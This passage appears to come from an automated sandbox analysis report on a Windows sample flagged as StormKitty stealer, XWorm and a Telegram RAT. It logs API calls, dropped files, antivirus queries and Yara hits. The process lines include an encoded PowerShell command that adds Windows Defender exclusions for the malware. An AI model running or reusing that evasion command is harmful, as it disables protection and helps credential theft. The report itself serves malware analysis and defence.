                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtOpenKey: Direct from: 0x7FFD3497814BJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtQueryValueKey: Direct from: 0x7FFD93C6FD76Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtQueueApcThread: Direct from: 0x7FFD93C99EE7Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtQueryValueKey: Direct from: 0x7FFD93C6FEA9Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtQueryVolumeInformationFile: Direct from: 0x7FFD93CB46F1Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtQueryVolumeInformationFile: Direct from: 0x7FFD93C3D195Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtQueryValueKey: Direct from: 0x7FFD93D846B8Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtSetInformationProcess: Direct from: 0x7FFD93BB626BJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtSetInformationProcess: Direct from: 0x7FFD93C4A3DFJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtCreateFile: Direct from: 0x7FFD93CB4667Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtMapViewOfSection: Direct from: 0x7FFD34BBC242Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtCreateThreadEx: Direct from: 0x7FFD93B588D5Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtCreateMutant: Direct from: 0x7FFD3496E34BJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtQueryAttributesFile: Direct from: 0x7FFD93C49F1CJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtDeviceIoControlFile: Direct from: 0x7FFD34B9F591Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtSetInformationProcess: Direct from: 0x7FFD93C4DA3CJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtQueryValueKey: Direct from: 0x7FFD93BBE9FEJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtUnmapViewOfSection: Direct from: 0x7FFD921E3C7DJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtDeviceIoControlFile: Direct from: 0x7FFD3497D938Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtSetInformationProcess: Direct from: 0x7FFD93CB4672Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtCreateThreadEx: Direct from: 0x7FFD912AB1ACJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtUnmapViewOfSection: Direct from: 0x7FFD921E3F5FJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtOpenKey: Direct from: 0x7FFD921E3812Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtReadFile: Direct from: 0x7FFD93C76FE3Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtCreateThreadEx: Direct from: 0x7FFD93BE67CBJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtDeviceIoControlFile: Direct from: 0x7FFD93CFF207Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtCreateFile: Direct from: 0x7FFD93C6FCCEJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtOpenKeyEx: Direct from: 0x7FFD921E7FC1Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtDeviceIoControlFile: Direct from: 0x7FFD34964514Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtSetInformationFile: Direct from: 0x7FFD93BB72C8Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtSetInformationFile: Direct from: 0x7FFD921DA731Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtCreateThreadEx: Direct from: 0x7FFD34807A54Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtReadFile: Direct from: 0x7FFD93C45F36Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtCreateMutant: Direct from: 0x7FFD34E76CD0Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtMapViewOfSection: Direct from: 0x7FFD93CB7EE9Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtQueryVolumeInformationFile: Direct from: 0x7FFD9287008BJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtQueryValueKey: Direct from: 0x7FFD93D568FCJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtQueryVolumeInformationFile: Direct from: 0x7FFD921E734CJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtSetContextThread: Direct from: 0x7FFD93B791D2Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtCreateFile: Direct from: 0x7FFD93C45FD7Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtEnumerateKey: Direct from: 0x7FFD34976D45Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtQueryValueKey: Direct from: 0x7FFD93BC40A3Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtQueryValueKey: Direct from: 0x7FFD8F761DC5Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtSetInformationProcess: Direct from: 0x1419B029C85Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtDeviceIoControlFile: Direct from: 0x7FFD34961E07Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtCreateFile: Direct from: 0x7FFD93C3D1F6Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtSetInformationProcess: Direct from: 0x7FFD34B8716AJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtCreateMutant: Direct from: 0x7FFD940BCAC6Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtSetInformationProcess: Direct from: 0x7FFD93C6A028Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtQueryValueKey: Direct from: 0x7FFD921E4413Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtOpenKey: Direct from: 0x7FFD93BBDF8FJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtCreateFile: Direct from: 0x7FFD93C4A418Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtQueryAttributesFile: Direct from: 0x7FFD92870674Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtCreateFile: Direct from: 0x7FFD921E517FJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtNotifyChangeKey: Direct from: 0x7FFD3495B256Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtSetInformationProcess: Direct from: 0x7FFD93BAFF6BJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtOpenKeyEx: Direct from: 0x7FFD93CC3619Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtQueryValueKey: Direct from: 0x7FFD93C9797BJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtSetValueKey: Direct from: 0x7FFD9287296FJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtDeviceIoControlFile: Direct from: 0x7FFD3497F3E5Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtQueryValueKey: Direct from: 0x7FFD921E3695Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtReadFile: Direct from: 0x7FFD921DC9C8Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtOpenKeyEx: Direct from: 0x7FFD3480A044Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtSetInformationProcess: Direct from: 0x7FFD93C4A427Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtCreateKey: Direct from: 0x7FFD921E126EJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtDeviceIoControlFile: Direct from: 0x7FFD3497C3FFJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtQueryValueKey: Direct from: 0x7FFD93CC36AEJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtSetInformationProcess: Direct from: 0x7FFD93CB462EJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtOpenKey: Direct from: 0x7FFD34809C9DJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtQueryValueKey: Direct from: 0x7FFD93C6FC6CJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtSetInformationProcess: Direct from: 0x7FFD93BAFF46Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtOpenKey: Direct from: 0x7FFD93BC47E4Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtCreateFile: Direct from: 0x7FFD93BB62A4Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtClose: Direct from: 0x7FFD34805901
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtOpenFile: Direct from: 0x7FFD921DE322Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtSetInformationProcess: Direct from: 0x7FFD93C6A005Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtQueryValueKey: Direct from: 0x7FFD921E5768Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtQueryAttributesFile: Direct from: 0x7FFD93C2BC4AJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtOpenFile: Direct from: 0x7FFD93C332D3Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtClose: Direct from: 0x7FFD921E713F
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtOpenKey: Direct from: 0x7FFD93C54E3CJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtCreateThreadEx: Direct from: 0x7FFDB43E26A1Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtQueryVolumeInformationFile: Direct from: 0x7FFD93CB46D9Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtMapViewOfSection: Direct from: 0x7FFD93C4A7F5Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtMapViewOfSection: Direct from: 0x7FFD3496969AJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtCreateThreadEx: Direct from: 0x7FFD93BE8EE0Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtSetInformationProcess: Direct from: 0x7FFD93BAFF57Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtSetInformationProcess: Direct from: 0x7FFD93C4DAA0Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtSetInformationProcess: Direct from: 0x7FFD93BB62B3Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtSetValueKey: Direct from: 0x7FFD3480A41FJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtOpenKeyEx: Direct from: 0x7FFD93C287B7Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtMapViewOfSection: Direct from: 0x7FFD921E3EA1Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtQueryVolumeInformationFile: Direct from: 0x7FFD9286F239Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtQueryValueKey: Direct from: 0x7FFD93CC040BJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtCreateMutant: Direct from: 0x7FFD921DD2E8Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtMapViewOfSection: Direct from: 0x7FFD3495B460Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtCreateFile: Direct from: 0x7FFD93C783DCJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtQueryValueKey: Direct from: 0x7FFD921E4D36Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtQueryValueKey: Direct from: 0x7FFD921E55C5Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGUAbgBnAGkAbgBlAGUAcgBcAEQAZQBzAGsAdABvAHAAXABiADMAOQB3AFcAMwBqAFkASwBPAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABlAG4AZwBpAG4AZQBlAHIAXABEAGUAcwBrAHQAbwBwAFwAYgAzADkAdwBXADMAagBZAEsATwAuAGUAeABlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGUAbgBnAGkAbgBlAGUAcgBcAGQAbwBjAHUAbQBlAG4AdABzAFwATwBuAGUARAByAGkAdgBlAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABlAG4AZwBpAG4AZQBlAHIAXABkAG8AYwB1AG0AZQBuAHQAcwBcAE8AbgBlAEQAcgBpAHYAZQAuAGUAeABlAA==Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess created: C:\Users\user\AppData\Local\Temp\arndry.exe "C:\Users\user\AppData\Local\Temp\arndry.exe" Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc qqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaemaogbcafuacwblahiacwbcaguabgbnagkabgblaguacgbcaeqazqbzagsadabvahaaxabiadmaoqb3afcamwbqafkaswbpac4azqb4aguaowagaeeazabkac0atqbwafaacgblagyazqbyaguabgbjaguaiaataeuaeabjagwadqbzagkabwbuafaacgbvagmazqbzahmaiabdadoaxabvahmazqbyahmaxablag4azwbpag4azqblahiaxabeaguacwbrahqabwbwafwaygazadkadwbxadmaagbzaesatwauaguaeabladsaqqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaemaogbcafuacwblahiacwbcaguabgbnagkabgblaguacgbcagqabwbjahuabqblag4adabzafwatwbuaguarabyagkadgblac4azqb4aguaowagaeeazabkac0atqbwafaacgblagyazqbyaguabgbjaguaiaataeuaeabjagwadqbzagkabwbuafaacgbvagmazqbzahmaiabdadoaxabvahmazqbyahmaxablag4azwbpag4azqblahiaxabkag8aywb1ag0azqbuahqacwbcae8abgblaeqacgbpahyazqauaguaeablaa==
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc qqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaemaogbcafuacwblahiacwbcaguabgbnagkabgblaguacgbcaeqazqbzagsadabvahaaxabiadmaoqb3afcamwbqafkaswbpac4azqb4aguaowagaeeazabkac0atqbwafaacgblagyazqbyaguabgbjaguaiaataeuaeabjagwadqbzagkabwbuafaacgbvagmazqbzahmaiabdadoaxabvahmazqbyahmaxablag4azwbpag4azqblahiaxabeaguacwbrahqabwbwafwaygazadkadwbxadmaagbzaesatwauaguaeabladsaqqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaemaogbcafuacwblahiacwbcaguabgbnagkabgblaguacgbcagqabwbjahuabqblag4adabzafwatwbuaguarabyagkadgblac4azqb4aguaowagaeeazabkac0atqbwafaacgblagyazqbyaguabgbjaguaiaataeuaeabjagwadqbzagkabwbuafaacgbvagmazqbzahmaiabdadoaxabvahmazqbyahmaxablag4azwbpag4azqblahiaxabkag8aywb1ag0azqbuahqacwbcae8abgblaeqacgbpahyazqauaguaeablaa==Jump to behavior
                        Source: b39wW3jYKO.exe, 00000000.00000002.4618510904.00000141820D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager

                        Language, Device and Operating System Detection

                        barindex
                        Yara detected Telegram Recon
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\arndry.exe, type: DROPPED
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeQueries volume information: C:\Users\user\Desktop\b39wW3jYKO.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Serialization\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Serialization.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeQueries volume information: C:\Users\user\Documents\OneDrive.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeQueries volume information: C:\Users\user\AppData\Local\Temp\arndry.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeQueries volume information: C:\Users\user\Documents\OneDrive.exe VolumeInformation
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                        Source: Amcache.hve.12.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                        Source: Amcache.hve.12.drBinary or memory string: msmpeng.exe
                        Source: Amcache.hve.12.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                        Source: Amcache.hve.12.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                        Source: Amcache.hve.12.drBinary or memory string: MsMpEng.exe
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                        Stealing of Sensitive Information

                        barindex
                        Yara detected BrowserPasswordDump
                        Source: Yara matchFile source: 0.2.b39wW3jYKO.exe.1419c0e0000.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.b39wW3jYKO.exe.1419c0e0000.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.4651442435.000001419C0E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: b39wW3jYKO.exe PID: 6412, type: MEMORYSTR
                        Yara detected StormKitty Stealer
                        Source: Yara matchFile source: 0.2.b39wW3jYKO.exe.1419c0e0000.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.b39wW3jYKO.exe.1419c0e0000.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.4651442435.000001419C0E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.4618510904.00000141820D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: b39wW3jYKO.exe PID: 6412, type: MEMORYSTR
                        Yara detected Telegram RAT
                        Source: Yara matchFile source: 9.0.arndry.exe.1d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000009.00000000.2419775202.00000000001D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: arndry.exe PID: 3804, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\arndry.exe, type: DROPPED
                        Yara detected XWorm
                        Source: Yara matchFile source: 9.0.arndry.exe.1d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000009.00000002.2501821797.000000000239D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000000.2419775202.00000000001D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.4618510904.00000141820D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
